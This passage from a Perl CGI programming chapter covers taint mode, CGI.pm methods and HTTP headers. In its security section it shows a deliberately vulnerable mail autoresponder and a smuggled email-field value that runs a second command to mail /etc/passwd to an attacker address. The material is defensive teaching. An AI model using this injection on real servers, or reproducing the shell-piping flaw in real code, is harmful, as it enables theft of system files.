Ch 19 -- Developing CGIs with Perl
UNIX Unleashed, Internet Edition
By Matt Curtin
A few points are worth keeping in mind when writing CGI programs in Perl. (Most likely,
these are reminders of things you have already learned.)
- Perl puts its environment variables into the hash (sometimes known as "associative
array") %ENV. To reference the environment variable HOME, you would
then use $ENV{'HOME'}.
- Much of this chapter will deal with using a Perl module known as CGI.pm,
or one of its more task-specific friends. (An object-oriented Perl module such as CGI.pm
plays roughly the role of a C++ or Java "class": it is a reusable component that
provides "methods" to your programs. Methods are just OO-speak for functions.)
- Many of the code examples here are only "snippets," which need to be
incorporated into CGI programs in order to actually run.
Why Perl?
Why not?
Actually, there are quite a few reasons to use Perl. Perl is a mature, portable,
and flexible programming language. Such tasks as reading, writing, and mangling text
are ideally done in Perl. A great deal of CGI programming is essentially text processing,
sometimes in fairly creative ways, which makes Perl well-suited to the task of CGI
programming. Additionally, there is a large base of free modules to make the task
of CGI programming even easier, and many freely available programs that you can
modify for your own needs or study to learn new techniques. Let's consider some needs of
CGI programs in more detail, and compare Perl with some other languages.
Requirements of a CGI Language
You can use just about any programming language to write CGI programs--Shell,
Scheme, C, Java, you name it. If it's a real programming language, you can write
CGI with it. Not that doing so is a good idea, but you can even write CGI programs
using something like BASIC. The point is that there's a difference between a language
you can use and a language that you should use.
The language that you use for CGI should fit the application, just as in any other
programming task. Typically, CGI programs perform tasks such as pattern matching,
interfacing to databases, and generating HTML dynamically. Perl is by far the most
popular CGI programming language because it is suited so well to these types of tasks.
In the following sections, I briefly compare Perl to some other programming languages
that you can use for CGI programming. I do so strictly from the perspective of the
needs of a good language for CGI programming.
Perl Versus UNIX Shell
UNIX shell scripts tend to be highly portable across
various platforms. A number of trade-offs exist, though, in that shell scripts tend
to be much slower than the same script implemented in Perl, C, or some other language
that performs compilation of the entire program before it can be executed. You can
handle deficiencies in the shell's capability to perform serious file manipulation
by using tools such as awk, but even awk has limitations that could be significant
in a CGI environment (such as being able to have only one file open at a time). As
a result, shell is typically useful only for the smallest of scripts, such as simple
<ISINDEX> gateways to services such as finger, archie, or other command-line
tools, where you're only interested in seeing the results. Even in these cases, if
you want to manipulate the results, or convert them from standard text to HTML, perhaps
making appropriate words links to related or explanatory pages, Perl becomes a better
option.
Perl Versus C/C++
Some CGI programmers prefer to use C, often because it's
simply what they know. CGI programs implemented in C suffer from a number of problems,
though: they're more likely to be susceptible to bugs in string handling or memory
management that might even turn out to be security bugs. C is a great language for
implementing systems that were done in assembler before C came about (such as operating
systems) because it is very fast and allows the programmer to perform very low-level
functions from a higher-level language that is more portable (than assembler) across
architecture types.
CGI programs implemented in C, however, require at least a recompile for the target
platform. If you're making a jump from one type of system to another, rewriting some
parts of the program might even be required. C forces the CGI programmer to deal
with other tasks (such as memory management) that only get in the way of accomplishing
the task at hand. Further, its pattern matching capabilities are far behind
Perl's. True, you can add pattern matching functionality, but that's additional
overhead that must be compiled into your CGI program, rather than simply being an
internal function, as it is in Perl.
I wouldn't implement an operating system in Perl (although I'm sure some people
would), and I wouldn't implement a CGI program in C (although some do). Use the right
tool for the job.
Perl Versus Java
The entire world has become abuzz with talk of Java. For
this reason, some programmers have tried to use Java for everything, including CGI.
Doing so presents a number of advantages; however, they currently seem to be outweighed
by the consequences. Java's strengths include portability and simplicity. Remember,
though, that much of the data passed to a CGI application arrives through the operating system's environment.
As Java does not support access to environment variables (because of portability
issues), a programmer needs to write a wrapper that will read the environment, and
then invoke the Java program using a command-line interface, with the appropriate
environment variables defined as properties.
Java is very much in the same boat as C when it comes to functionality. Although
the Java programmer is significantly less inclined to cause bugs due to silly errors
than the C programmer is, the Java programmer ends up having to implement nearly
everything, either in the CGI program itself or in a number of requisite classes that
must be distributed along with the program. Much of the promise of Java
has already been fulfilled in Perl, especially in the realm of CGI programming. Unless
Java does some job much better than Perl, relating specifically to the program you're
planning to develop, Perl is a much better language for CGI programming.
If you do have a task to perform that really is best done in Java, it's probably
best to not use CGI, but rather "servlets," or some other server-specific
API. Of course, in doing this, you might lose the server-portability that you have
in using CGI.
How Perl Does CGI
Some basic understanding of how Perl does CGI will be useful before we go forward.
If you're already experienced with CGI programming, you might like to skip ahead
to the next section, or glance over this section, looking for reminders.
Making the Server Able to Run Your Program
Remember, before a CGI program can run, several things will need to have taken
place:
- The HTTP server will need to have been told that your program is a CGI program,
either by the directory it's under (such as somewhere under cgi-bin), or
the file extension (such as .pl or .cgi). Consult your server's
documentation for how to do this.
- The operating system will have to allow its execution. This requires that the
"execute bit" be turned on for the CGI program file. This can be done with
the chmod(1) command, like
chmod +x myprogram.pl
- The location of the Perl interpreter must be specified in the first line of code.
In all of these examples, I use /usr/bin/perl. If Perl is installed somewhere
else on your system, either change the first line to have the correct path to the
Perl interpreter, or create a symbolic link so that /usr/bin/perl will reference
the correct file. Incidentally, this is also the line on which important flags such as
-T and -w are specified, if you choose to use them. (Use of
these flags is considered later.)
Some Examples
At this point, it would be useful to consider some example CGI programs. Remember,
the web browser will need to be told the content type of the data coming its way
in the HTTP header. Once this has been done, the data itself can come down, and will
be interpreted properly by the browser. In the case of HTML, you'll need to have
the HTTP header indicate the content type as text/html, send two newlines (to mark
the end of the header and the beginning of the data), and then the HTML.
Your First CGI Program in Perl
Of course, the classic first program in
any language is "Hello, world!" Likely, you've already seen this in Perl.
In Listing 19.1, you'll see it again, with a twist: it's a CGI program.
Listing 19.1. "Hello, world"
#!/usr/bin/perl -Tw
print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>Hello, world!</title>
</head>
<body>
<h1>Hello, world!</h1>
</body>
</html>
EOD
Note the double newline (that is, the empty line) between the last HTTP header (Content-type: text/html)
and the first line of data (the <!DOCTYPE> declaration). If you're missing this, your
program will not work properly.
Of course, this isn't really very interesting, since we could have achieved the
same result by writing a standard HTML file. However, the power of CGI becomes a
bit more obvious when we do something slightly fancier: tell the user the
result of the uptime(1) command, which is what we do in Listing 19.2.
Listing 19.2. Fancy "hello, world"
#!/usr/bin/perl -Tw
$ENV{'PATH'} = "";
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # -T checks these too before running commands
$|=1;
print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>Fancy hello world!</title>
</head>
<body>
<h1>Hello world!</h1>
How long has this system been up?
<pre>
EOD
system("/usr/bin/uptime"); # for Solaris, *BSD, Linux
# system("/usr/bsd/uptime"); # for IRIX
print <<EOD;
</pre>
</body>
</html>
EOD
echo.pl: Seeing CGI Environment Variables
Listing 19.3 has another
program that should prove to be interesting: a Perl version of the popular echo.sh
program that has come with a number of different HTTP servers, including NCSA's HTTPd
and Apache. We're simply walking through the %ENV hash, and returning each key (environment
variable), and its value, as a plain text file.
Listing 19.3. Perl Translation of echo.sh
#!/usr/bin/perl -Tw
print "Content-type: text/plain\n\n";
foreach $key (keys %ENV) {
print "$key=$ENV{$key}\n";
}
Listing 19.4 is the same thing, except a bit fancier, using HTML tables:
Listing 19.4. Fancy CGI Environment Viewer
#!/usr/bin/perl -Tw
print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>What's our environment, anyway?</title>
</head>
<body>
<h1>What's our environment, anyway?</h1>
<table border>
<caption>Environment variables and their values</caption>
<TR>
<th>Variable</th>
<th>Value</th>
</TR>
EOD
foreach $key(sort keys %ENV) {
print "<tr><td> $key </td><td> $ENV{$key} </td></tr>\n";
}
print <<EOD;
</table>
</body>
</html>
EOD
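Listing 19.4 copies each value straight into the page. Some of those values, such as HTTP_USER_AGENT and HTTP_REFERER, are supplied by the client, so a value containing markup would be interpreted by the browser. Here is a minimal sketch of escaping keys and values before printing them; html_escape and env_rows are hypothetical helper names, not part of any module:

```perl
use strict;
use warnings;

# Replace the characters that HTML treats specially. '&' must be
# handled first, or the entities produced below would be mangled.
sub html_escape {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

# Build the table rows for the environment viewer, escaping every
# key and value.
sub env_rows {
    my $html = '';
    foreach my $key (sort keys %ENV) {
        my $value = defined $ENV{$key} ? $ENV{$key} : '';
        $html .= '<tr><td>' . html_escape($key) . '</td><td>'
               . html_escape($value) . "</td></tr>\n";
    }
    return $html;
}
```

With these helpers, the foreach loop in Listing 19.4 could be replaced by print env_rows();.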
perldoc.pl: A Web Front-End to perldoc(1)
Now let's invent
a problem that might actually exist. You have found perldoc(1) to be incredibly
useful. You would like to be able to use it from home, but don't want to do so through
a telnet(1) window; you'd rather use your browser.
This is an easy task. The next listing shows a very simple <ISINDEX>
interface to the perldoc(1) command, which demonstrates simple text processing
and handling of (potentially dangerous) user input.
Notice the URL when perldoc.pl is run the first time. Then submit a query,
and notice the URL. Your submission becomes part of the URL, in the query string.
To perform the lookup of the submitted command, we run the query string through a regular
expression and then use the captured subexpression to assign its value to $query.
Remember, input from users is potentially dangerous, so we need to be sure that we're
not allowing shell metacharacters anywhere near a shell. The regular expression /^(\w+)$/
matches only if the query consists entirely of alphanumeric characters and underscores.
The match by itself doesn't clean anything, though: with Perl's -T switch, $ENV{'QUERY_STRING'}
is still flagged as "tainted", that is, untrusted and potentially dangerous. Captured
subexpressions such as $1 are not tainted, so by assigning $1 to a new variable
we tell Perl that we know what we're doing, and Perl allows us to proceed.
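The same detainting idea can be packaged as a small helper. In this sketch, detaint_word is a hypothetical name. It spells out the allowed characters instead of using \w, so it cannot match non-ASCII "word" characters; it anchors with \z, so a trailing newline is rejected too; and it returns undef when the input doesn't qualify rather than relying on whatever $1 held before (a failed match leaves $1 unchanged):

```perl
use strict;
use warnings;

# Return an untainted copy of $input if it consists only of ASCII
# letters, digits, and underscores; otherwise return undef.
sub detaint_word {
    my ($input) = @_;
    return undef unless defined $input;
    return $1 if $input =~ /^([A-Za-z0-9_]+)\z/;   # captures are untainted
    return undef;
}
```

In Listing 19.5, $query = detaint_word($ENV{'QUERY_STRING'}); could replace the match-and-assign lines, followed by a check that $query is defined before running anything.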
(As an aside, it's noteworthy that the result of a perldoc(1) request
is in the same format as a man(1) request: nroff with man
macros. Because of this, only minor modifications are needed to perldoc.pl
to create a front end to man(1). Why not give that a try?)
Listing 19.5. Webified perldoc(1)
#!/usr/bin/perl -T
$ENV{'PATH'} = "/bin:/usr/bin:/usr/local/bin";
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};  # -T checks these too before running commands
# matches only alphanumerics and _; $1 is untainted, so $query is detainted
$query = ($ENV{'QUERY_STRING'} =~ /^(\w+)$/) ? $1 : "";
print <<EOD;
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>perldoc $query</title>
</head>
<body bgcolor="#ffffff">
<center>
<h1><code>perldoc</code> Interface</h1>
</center>
<isindex>
<h2>$query</h2>
<pre>
EOD
# Don't bother running the command if there's no argument
if ($query) {
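open(PERLDOC, "/usr/local/bin/perldoc $query |") || die "Cannot perform perldoc query: $!";
while (<PERLDOC>) {
s/.\cH//g;    # strip nroff overstrikes (a character followed by a backspace)
s/&/&amp;/g;  # then escape HTML special characters, & first
s/</&lt;/g;
s/>/&gt;/g;
print;
}
close PERLDOC;
}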
print <<EOD;
</pre>
<hr>
<address><a href="http://www.research.megasoft.com/people/cmcurtin/">C
Matthew Curtin</a></address>
</body>
</html>
EOD
At this point, you should have some understanding of how Perl works with CGI.
You can imagine a number of things that we haven't covered yet, like how to handle
cookies, process more complex user input, forms, and so on. Even potentially difficult
tasks are made much simpler with the CGI.pm module. We'll cover its use
through the rest of the chapter.
CGI Programming Concerns
Would you connect your machine to the Internet if you knew that doing so would
enable people to run commands on your machine? What if that machine has all your
personal and private data on it? What if that machine is your company's Web server?
Well, keep in mind that's exactly what CGI is. A remote user, most often someone
who hasn't gone through any kind of authentication--and someone who can't easily
be tracked down (if at all)--is running programs on your Web server. I can't emphasize
enough that this situation can be very dangerous. So let me say again: This situation
can be very dangerous.
CGI is dangerous.
The nice thing about CGI on your Web server is that the programs that people are
running on your machine are programs you've written. (You have control over what's
on your server and what it can and can't do.) The bad thing about CGI on your Web
server is that the programs that people are running on your machine are programs
you've written. (Although you might write programs that are very nice and that do
only what you want them to, you might be surprised to find out what else a naughty
person can make them do.)
Trust Nothing
Consider the code in Listing 19.6. This little CGI program, which is sitting on
your company's Web server, is called when a user enters an e-mail address to get
more information about your company's New SuperWidgets.
Listing 19.6. SuperWidget Autoresponder.
#!/usr/bin/perl
use CGI;
$query = new CGI;
$email_addr = $query->param('email');
open(MAIL, "| Mail -s 'More information' $email_addr");
print MAIL <<EOD;
Thank you for your request.
Here at The Very Big Corporation of America, we think that
our SuperWidgets(tm) are pretty cool, and we hope you agree.
Sincerely,
Joe Mama
President, and Chief Executing Officer
EOD
Isn't that easy? Isn't Perl great? Now, you can just slap this bad boy up on the
server, and you're all done. Right? Wrong. Sure, the program can do what you think
it will, but it might also do something you haven't thought about. If someone claims
that his e-mail address is something like
sillyname@sillyplace.com ; /bin/mail badboy@naughty.no < /etc/passwd
you might have a bit of a problem. Namely, badboy@naughty.no just got
a copy of your password file. Oops.
The lesson here is obvious: don't trust any input from users. Remember, CGI programs
are programs that run on your server. If these programs can be fooled into performing
a task beyond what you've anticipated, you can have very serious security problems.
Fortunately, Perl has an extremely useful -T switch, which would tell you about the
vulnerability here and refuse to run. Don't even think about running a CGI program
without specifying the -T switch. This is done by adding it to the end of the line
specifying the path to Perl, making it look like:
#!/usr/bin/perl -T
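Turning on -T only makes Perl refuse to run Listing 19.6; the program itself still has to be fixed. One approach, sketched here under some assumptions (that the mail program lives at /usr/bin/mail and accepts -s as in the listing; untaint_email and send_info are hypothetical names), is to accept only addresses built from a conservative set of characters and to start mail with the list form of a piped open(), which runs the program directly so no shell ever sees the address:

```perl
use strict;
use warnings;

# Accept only a deliberately conservative address shape: spaces,
# semicolons, pipes, redirections, and quotes cannot get through.
# Some unusual but valid addresses are rejected; that is the trade-off.
sub untaint_email {
    my ($addr) = @_;
    return undef unless defined $addr;
    return $1 if $addr =~ /^([A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\z/;
    return undef;
}

# Send the canned reply without involving a shell.
# /usr/bin/mail and its -s option are assumptions; adjust for your system.
sub send_info {
    my ($addr) = @_;
    my $safe = untaint_email($addr)
        or die "Refusing suspicious address\n";
    # List-form pipe open: arguments go straight to the program,
    # so shell metacharacters in them have no special meaning.
    open(my $mail, '|-', '/usr/bin/mail', '-s', 'More information', $safe)
        or die "Cannot run mail: $!\n";
    print $mail "Thank you for your request.\n";
    close($mail) or die "mail failed (status $?)\n";
}
```

Under -T you would still set $ENV{'PATH'} as in Listing 19.2, because Perl checks it before running any external program, even one named by an absolute path.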
You especially need to consider this situation if you have any sort of "secure"
service on the server, such as forms served by SSL that are used to get credit card
numbers or other sensitive data from customers or partners. The more data that you
have on the machine that is attractive to bad guys, the more resources they'll
spend trying to get at what you're attempting to hide.
Another important consideration is that you don't really know what you're talking
to on the other side of that connection. It might not be a browser at all, but rather
someone who used telnet to talk to your HTTP port, attempting to interact with your
daemon or programs in ways you haven't thought about. You have good reason to be
paranoid about this problem.
Common Pitfalls with CGI Programs in Perl
Perl is a wonderfully powerful language. You do need to be careful while writing
CGI programs to avoid common pitfalls, however. Some of them are related to functionality,
whereas others are related to security. Keep them all in mind, and remember to make
your programs functional and secure. Now take a look at some of my favorite pitfalls:
- Passing unsafe data to shells
- This problem is, by far, the worst for new (and careless) Perl programmers. An
example is shown in Listing 19.6. Listing 19.5 also had potential for that problem, since
we used a shell (when we opened the PERLDOC file handle), but our handling
of $ENV{'QUERY_STRING'} and turning it into $query took care of
this problem. If you possibly can, you're almost always best off avoiding the use
of shells in CGI programs.
- Making assumptions about the environment
- Many people write programs assuming that other programs and files in the system
will be where they are on their system. In practice, programs and configuration files
might be in another place, or not even exist, on an operating system from another
vendor. In making such assumptions, Perl's extreme portability is hindered, and you
have to rework the programs when moving from one environment to another. I like to
keep dependencies on external resources (such as the shell or underlying UNIX commands)
to a minimum, not using them at all unless I can't avoid doing so for some reason,
which is a pretty rare event. (In Listing 19.5, however, you'll note that we did use one.
In that case, avoiding the shell would have made the program more complex,
so it made more sense to use a shell and detaint the user's input ourselves.)
- Having file permission problems
- Remember, the program is going to be run under the UID of the HTTP daemon on
your system. You need to be sure that the HTTP daemon has read access to the program,
that the program has the execute bit turned on, and that any files that will be read,
written, created, or deleted can have whatever you need done to them under the UID
of the HTTP daemon.
- Failing to perform sufficient error checking
- Do yourself a favor, and check for error conditions. When your program encounters
an unexpected error on an open() or fork() or anything else, rather than have it
silently stop working, use die() to make it complain loudly about the problem. Notice
how Listing 19.5 uses die() with the open(). If perldoc isn't in /usr/local/bin/,
or if some other error occurs, use of that die() could save you a lot of
time hunting down and eradicating the problem.
- Not taking advantage of useful Perl options
- Here's a fun way to waste lots of time trying to find stupid mistakes. We've
already mentioned -T, but let me emphasize again: don't ever run CGI Perl programs
without it. Also, another useful switch is -w. This will give you warnings about
potential problems in your code. Never test code without -w specified. If you are
getting warnings when -w is specified, you're best off solving them, not making them
"go away" by removing -w. On the other hand, if you are getting a warning,
you know what it means, why it's being made, and that it won't create problems for
you, it might be all right to remove -w when moving your program to production.
- Not taking advantage of useful Perl modules
- Much of the work in providing interfaces to data, parsing capabilities, and so
on already exists. Instead of having to implement them, you'll be much more productive
using that which is already available. You should definitely use the several extremely
cool CGI Perl modules if you're writing any CGI that's more than a few lines long.
In fact, if you don't have CGI.pm, go get it right now. I can wait. Done? Good, you're
going to need it in the next section.
- Forgetting to flush STDOUT
- Good CGI programmers tell their programs to flush the STDOUT output buffer after
each write. This way, the HTTP header (and the MIME type in it) gets out, and the browser can see it,
before the program goes down in flames. (This is done by setting $| to a nonzero value.
Look at Listing 19.2: comment out the line where I set the value of $|, and then run
the program again. See the difference? When the output is buffered, the output of uptime(1),
which the child process writes directly, can arrive before the rest of the program's output,
including the Content-type header. This is clearly bad, so be sure
to set $| to something nonzero for your CGI programs. Perl 5.6 and later try to flush
output handles before system() forks, so you might not see the problem there, but
setting $| remains the safe habit.)
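Two of these pitfalls, passing data to shells and skipping error checks, can be handled together by running external programs with the list form of a piped open(). In this sketch, run_no_shell is a hypothetical helper: the program and its arguments are passed as separate list elements so that no shell interprets them, and every step that can fail is checked with die():

```perl
use strict;
use warnings;

# Run a program and return its standard output, without a shell.
# Require the program plus at least one argument: a single-element
# list would be handed to the shell if it contained metacharacters.
sub run_no_shell {
    my @cmd = @_;
    die "run_no_shell needs a program and at least one argument\n" if @cmd < 2;
    open(my $out, '-|', @cmd) or die "Cannot run $cmd[0]: $!\n";
    my $output = do { local $/; <$out> };   # slurp all of the output
    close($out) or die "$cmd[0] failed (status $?)\n";
    return defined $output ? $output : '';
}
```

For Listing 19.5, the call would look like run_no_shell('/usr/local/bin/perldoc', $query). Detainting $query and setting $ENV{'PATH'} are still needed under -T; the list form simply removes the shell from the picture.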
Introduction to CGI.pm
Using CGI.pm
Using CGI.pm is easy. To write a CGI program, you simply need to create a new
CGI object, throw some parameters at it, and a new CGI program is born. Now take
a look at some code snippets, and see what each one does.
You create a new CGI object just as you would create any other Perl object:
use CGI;
$cgi = new CGI;
You can also create CGI objects and feed them parameters at the same time. For
example, if you want to send some parameters in via an open file handle, you simply
need to pass the typeglob of the file handle you want. It can be STDIN, some file
with key/value pairs used for debugging, or just about anything else, as you can
see here:
$cgi = new CGI(*STDIN);
(In reality, you could just use the file handle name, but passing the typeglob
is the official method of passing file handles, which is why I show it here. The
* marks a "typeglob": a single symbol-table entry covering everything with a given
name. Hence, *STDIN includes the STDIN file handle as well as $STDIN, @STDIN, and %STDIN.)
Additionally, you can hardwire associative array key/value pairs into the new
object being created this way:
$cgi = new CGI({ 'king' => 'Arthur',
'brave' => 'Lancelot',
'others' => [qw/Robin Galahad/],
'servant' => 'Patsy'});
Another useful initialization option is to pass a URL-style query string, as follows:
$cgi = new CGI('name=lancelot&favoritecolor=blue');
And, of course, you can create a new CGI object with no values defined:
$cgi = new CGI('');
When to Use CGI.pm
As with all tasks when you're programming in Perl, you can find more than one
way to do the job. In my experience, if the program is more complex than what can
be reasonably accomplished in a few lines of code, or will require the parsing of
input from the user that is more complex than what can be obtained through environment
variables, then using CGI.pm is the way to go.
In the first example, in which the user's browser type is checked, doing the job
without CGI.pm is just as easy as doing it with CGI.pm. In such cases, I typically do
not use CGI.pm. These times are fairly rare, however; most of the time you use CGI,
you do so because someone wants to give some level of feedback to the server, which
means that the server needs to be able to read the data and make it useful.
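To get a feel for the work CGI.pm saves you, here is roughly what decoding a GET query string by hand involves: split on & or ;, split each pair at the first =, turn + back into spaces, decode %XX escapes, and keep every value for names that appear more than once. This is a simplified sketch (parse_query is a made-up name) that ignores POST bodies, file uploads, and character sets, all of which CGI.pm handles for you:

```perl
use strict;
use warnings;

# Decode a URL-encoded query string into a hash of array references,
# so repeated names (e.g. several checkboxes) keep every value.
sub parse_query {
    my ($qs) = @_;
    my %params;
    foreach my $pair (split /[&;]/, defined $qs ? $qs : '') {
        next unless length $pair;
        my ($name, $value) = split /=/, $pair, 2;
        $value = '' unless defined $value;
        foreach ($name, $value) {               # aliases both variables
            tr/+/ /;                             # '+' encodes a space
            s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge; # decode %XX escapes
        }
        push @{ $params{$name} }, $value;
    }
    return \%params;
}
```

Every corner this sketch cuts is a place where a hand-rolled parser can go wrong, which is a good argument for CGI.pm once input gets more complex than a single word.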
Sometimes you might need a specific part of CGI.pm but don't want the whole thing,
perhaps because you're optimizing for speed, or don't want to use the extra memory
of the whole CGI.pm module. In these cases, you can use a number of related modules
geared toward more specific tasks to give you some of the features you're looking
for in CGI.pm without the overhead.
You can find the WWW-related modules (including CGI) on the Web at
http://www.perl.org/CPAN/modules/by-category/15_World_Wide_Web_HTML_HTTP_CGI/
In the end, most often you'll find using CGI.pm or a related CGI module more advantageous
than doing the work yourself. In addition to CGI.pm's convenience, there
are some extra security checks to help keep you from being caught doing stupid things.
Use the tools available, unless the job is so small that they'll make more work for
you.
Some CGI.pm Methods
In this section, I've included examples to highlight some of the features that
I've found particularly useful in CGI.pm. Check the documentation for the complete
(and current) list of available features. I hope that the information I present here
is enough for you to understand how CGI.pm works so that when you see other features
in the documentation, you'll be able to begin using them quickly.
Much of this section has been adapted from the CGI.pm documentation, by
Lincoln Stein
<lstein@genome.wi.mit.edu>
http://www.genome.wi.mit.edu/~lstein/
and has been used with permission.
- keywords()
- You can fetch a list of keywords from an <ISINDEX> query by using the keywords()
method. For example,
@keywords = $cgi->keywords;
- param()
- You use this method to get and set the names and values of parameters. If you
need to know all the parameters (that is, their names) that were passed to your program,
you can use the param() method this way:
@params = $cgi->param;
- To get the value of a given parameter, simply pass the name of the parameter
whose value you want to fetch to the param() method. If the parameter has more than one value,
calling param() in list context returns all of them; in scalar context, it returns only the first.
$value = $cgi->param('foo'); # scalar context: the first value
@values = $cgi->param('foo'); # list context: all values
- Setting values is similarly easy. Passing a reference to an array as -values gives you
a multivalued parameter. This capability is useful for a number of purposes:
initializing elements of a fill-out form, changing the value of a field after it
has already been set, and so on.
$cgi->param( -name => 'foo',
-values => ['first', 'second', 'third', 'etc.']);
- append()
- If you need to add information to a parameter, you can use the append() method
as follows:
$cgi->append( -name => 'foo',
-values => ['some', 'more', 'stuff']);
- delete()
- This method, as the name suggests, deletes a parameter.
$cgi->delete('foo');
- delete_all()
- This method deletes all parameters, leaving an empty CGI object.
$cgi->delete_all();
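The scalar/list distinction in param() is ordinary Perl context sensitivity. The following is not CGI.pm's code; it is a hypothetical stand-in (the %params store and get_param are invented for illustration) showing how one accessor can return every value in list context and just the first in scalar context:

```perl
use strict;
use warnings;

# A hypothetical parameter store: each name maps to a list of values.
my %params = (
    foo  => ['first', 'second', 'third'],
    name => ['lancelot'],
);

# Return all values in list context, only the first in scalar context.
sub get_param {
    my ($name) = @_;
    my $values = $params{$name} or return;   # unknown name: () or undef
    return wantarray ? @$values : $values->[0];
}

my $value  = get_param('foo');   # scalar context
my @values = get_param('foo');   # list context
```

A trap follows from this: a call written inside a list, such as a hash constructor like (name => $cgi->param('name')), is made in list context, so a multivalued parameter can quietly add extra keys and values to the hash.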
Importing CGI.pm Methods into the Current Namespace
Given a list of names, the use CGI statement imports those methods into the current
namespace, where you can call them as plain functions. To import only specific methods, list them as follows:
use CGI qw(header start_html end_html);
It's possible that you'll want to import groups of methods into the current namespace
rather than individual methods on a one-by-one basis. Simply specify which method
family you want this way:
use CGI qw(:cgi :form :html2);
Be aware, however, that this makes the source code a bit more difficult to follow
for someone else. Additionally, this isn't considered "good OO" practice.
Importing the methods directly into your current namespace also makes the program much more
difficult to maintain and expand. Should you find yourself in a situation
where you want to use more than one CGI object, for example, it will become confusing
to keep track of which object you're referencing. Consider yourself warned.
The following are the method families available for you to use:
- :cgi
- These methods support the CGI protocol, including param(), path_info(),
cookie(), request_method(), header(), and so on.
- :form
- All the form-generating methods live here.
- :html2
- html2 shortcuts such as br(), p(), and so on are here,
as well as close-enough-to html2 methods such as start_html() and
end_html().
- :html3
- html3.2 tags such as html3 tables live here.
- :netscape
- Netscape-isms that aren't html3 are here. Some examples are frameset(),
blink(), and center().
- :html
- This family is a union of html2, html3, and Netscape.
- :standard
- This family is a union of html2, form, and cgi.
- :all
- This family is a union of everything.
If you want to use a tag that CGI.pm doesn't know about (one that a browser vendor has just
implemented, say), you can do so and still call it like any other method by importing the
:any method family, as in the following example. Using this family causes any unrecognized
method to be interpreted as a new HTML tag. Beware that typos are interpreted as new tags.
use CGI qw(:any :all);
$q=new CGI;
print $q->newtag({ parameter=>'value',
otherParameter=>'anotherValue'});
Saving State via Self-Referencing URL
A simple way of saving state information is to use the self_url()
method, which returns a URL that reinvokes the program with all its state
information. Here's the syntax:
$my_url = $cgi->self_url;
You can get the URL without all of the query string appended by using the url() method instead:
$my_url = $cgi->url;
Another method of saving state information is to use cookies. I talk about how
to use them later in the chapter.
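To do its job, self_url() has to turn the current parameters back into a query string. Here is a rough sketch of that encoding step; url_escape and build_query are hypothetical helpers, and they assume byte strings, so any Unicode text would need to be encoded to UTF-8 first:

```perl
use strict;
use warnings;

# Percent-encode everything except unreserved URL characters.
sub url_escape {
    my ($s) = @_;
    $s =~ s/([^A-Za-z0-9\-_.~])/sprintf('%%%02X', ord($1))/ge;
    return $s;
}

# Turn name => [values] pairs into name=value pairs joined with '&'.
# Sorting the names makes the output predictable.
sub build_query {
    my (%p) = @_;
    my @pairs;
    foreach my $name (sort keys %p) {
        push @pairs, url_escape($name) . '=' . url_escape($_) for @{ $p{$name} };
    }
    return join '&', @pairs;
}
```

Appending '?' followed by such a string to the program's URL (as returned by url()) yields a self-referencing link that carries the state along.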
CGI Functions That Take Multiple Arguments
Although I provided an example like the following already, it's important enough
to emphasize. If you want to create a text input field, for example, you can do so
like this:
$field = $cgi->textfield( -name => 'IQ',
-default => '160');
A nice side effect of being able to pass these specified arguments to a function
is that you can give arguments to tags, even if the CGI module doesn't know about them.
For example, if in some future version of HTML, the align argument is recognized, you can
simply start using it like this:
$field = $cgi->textfield( -name => 'IQ',
-default => '160',
-align => 'right');
HTTP Headers
The header() method, as shown here, returns the appropriate HTTP header
and a blank line beneath (to separate the header from the document itself). If no
argument is given, the default type of text/html is used.
print $cgi->header('text/html');
You can specify additional header information the same way you pass multiple arguments
to any object:
print $cgi->header( -type => 'text/html',
-status => '200 OK',
-expires => '+1h',
-cookie => $my_chocolate_chip);
You can even make up your own as in the following example:
print $cgi->header( -type => 'text/html',
-motto => 'Live Free or Die!');
Of course, making up your own header doesn't have much point because usually the
only thing that sees the headers is a browser. However, that does mean that if a
new version of HTTP is released and has headers that you want to use, you can do
so without waiting for a new version of CGI.pm.
You can specify the following:
- -type
- This is the MIME type of the document that the CGI program returns. In this case,
it's text/html. Any MIME type is valid here.
- -status
- This optional field is the HTTP status code. You might want to use it if your
CGI returns cached information that it gets from other servers; here's an example:
print $cgi->header( -type => 'text/html',
-status=> '203 Non-Authoritative Information');
- -expires
- Generally, browsers don't cache the results of CGI programs, but some naughty
browsers might, and sometimes proxy servers do also. You can limit the amount of
time that such dynamically generated pages will be cached through this mechanism
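as follows:
print $cgi->header( -type => 'text/html',
-expires => '+1h');
- The -expires value can be a relative time, such as +30s (30 seconds from now), +10m
(ten minutes), +1h (one hour), +3M (three months), or +10y (ten years); now or -1d, to
expire the page immediately; or an absolute date, such as Thursday, 25-Apr-1999 00:40:33 GMT.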
- -cookie
- You can use this parameter to generate a header that tells Netscape (and browsers
that wish they were Netscape, like Internet Explorer) to return a cookie for each
request made of this program. You can use the cookie() method to create and retrieve
session cookies.
- redirect()
- You can send a redirection request to the remote client, which then immediately goes
to the specified URL. (You should always specify absolute URLs in redirections; relative
URLs do not work properly.)
print $cgi->redirect('http://my.other.server/and/then/some/path');
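To make the header format concrete, here is a minimal sketch in core Perl (it does not use CGI.pm) that builds the kind of text header() emits for -type, -status, and -expires. The subroutine names http_header(), expires_time(), and http_date() are hypothetical. The relative-time notation is the one used by '+1h' in the -expires example earlier; treating a month as 30 days and a year as 365 days is a simplifying assumption of this sketch, not necessarily what CGI.pm does.

```perl
use strict;
use warnings;

# Fixed English day and month names, so the date does not depend on the locale.
my @DAY = qw(Sun Mon Tue Wed Thu Fri Sat);
my @MON = qw(Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec);

# Seconds per unit for relative offsets such as '+1h' or '-1d'.
# Months and years are approximated as 30 and 365 days (an assumption of this sketch).
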